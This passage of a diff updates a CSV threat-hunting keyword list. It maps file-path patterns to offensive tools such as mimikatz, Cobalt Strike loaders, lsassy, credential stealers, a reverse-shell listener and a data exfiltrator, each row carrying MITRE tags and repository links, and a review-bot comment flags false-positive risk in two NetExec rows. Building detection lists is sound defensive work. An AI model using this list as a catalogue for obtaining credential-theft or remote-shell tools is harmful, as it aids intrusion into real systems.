Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar.git*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar/releases*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. 
The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" "*/quicserver.exe*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*/r00t-3xp10it*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/raceabrt.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/rahul1406/cve-2022-0847dirtypipe-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RAI.git*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*/rakjong/mimikatz_bypassAV/*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/rakjong/mimikatz_bypassAV/*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*/ramnit.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/random-robbie/cve-2022-23131-exp*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with 
configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" -"*/Ransomware.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/Ransomware.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*/rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*/RasmanPotato*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" 
@@ -4921,16 +4968,19 @@ "*/ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.syso*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.syso*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" -"*/RationalLove.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/RationalLove.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/raw/kali/main/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/raw/kali/master/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/raw_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*/rawrpc.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - 
T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*/raw_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/rawrpc.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*/RC4BinaryEncryption.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/RC4Payload32.txt*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" -"*/RCStep/CSSG/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*/RDE1.git*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*/rdll_template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/rcat-v*-win-x86_64.exe*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/RCStep/CSSG/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" 
+"*/rdcman.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/RDE1.git*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*/rdll_template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rdp.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/RDPassSpray.git*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*/RDPCredentialStealer.git*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*/rdp-enum-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
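Review bot: The two NetExec rows added in this hunk, `*/rdcman.py*` and `*/rdp.py*`, match on a bare file name, so they will fire on any path containing a file of that name, yet they carry severity `10` with `metadata_comment` left at `N/A`. The `ratchatPT` rows at the top of the same hunk already record `risk of False positive` in that column; I would set the same value here, or narrow the keyword with a NetExec-specific parent directory so the match is tied to the tool rather than the file name. Both rows are also categorised `Credential Access` while `metadata_tool_tactics` lists `TA0007 - TA0003 - TA0002 - TA0001` without `TA0006`, the tactic the `lsassy` row in this hunk pairs with that category. That looks inconsistent and is worth confirming before consumers filter on either column.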
@@ -4939,17 +4989,17 @@ "*/readfile_bof.*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*/Readfile_BoF/*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
